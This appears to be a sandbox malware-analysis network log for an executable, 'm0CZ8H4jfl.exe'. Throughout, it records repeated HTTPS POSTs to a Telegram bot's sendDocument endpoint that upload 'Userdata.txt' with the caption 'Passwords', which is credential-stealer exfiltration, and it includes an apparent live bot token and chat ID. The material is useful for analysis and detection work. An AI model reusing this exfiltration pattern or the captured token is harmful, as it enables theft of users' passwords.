                                                                                                        2025-01-10 18:56:57 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44618,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535416,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.950008149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:58 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32a447bdac83
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:56:58 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 61 34 34 37 62 64 61 63 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32a447bdac83Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:58 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:58 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:56:58 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 31 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44619,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535418,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.950010149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:00 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32b6f09fd9a8
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:00 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 36 66 30 39 66 64 39 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32b6f09fd9a8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:00 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:00 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:00 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 32 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44620,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535420,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.950012149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:01 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32c98ada1a3c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:01 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 63 39 38 61 64 61 31 61 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32c98ada1a3cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:02 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:02 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:02 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44621,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535422,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.950014149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:03 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32dc17249353
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:03 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 64 63 31 37 32 34 39 33 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32dc17249353Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:03 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:03 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:03 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44622,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535423,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.950016149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:05 UTC270OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32ed42a59927
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        2025-01-10 18:57:05 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 65 64 34 32 61 35 39 39 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32ed42a59927Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:05 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:05 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:05 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44623,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535425,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.950018149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:06 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd32ffb2387d02
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:06 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 66 66 62 32 33 38 37 64 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd32ffb2387d02Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:07 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:07 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2025-01-10 18:57:07 UTC534INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 36 32 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 33 35 34 32 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":44624,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736535427,"document":{"file_name":"U


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.950020149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:57:08 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd3312139f8085
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:57:08 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 31 32 31 33 39 66 38 30 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd3312139f8085Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:57:09 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:57:09 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
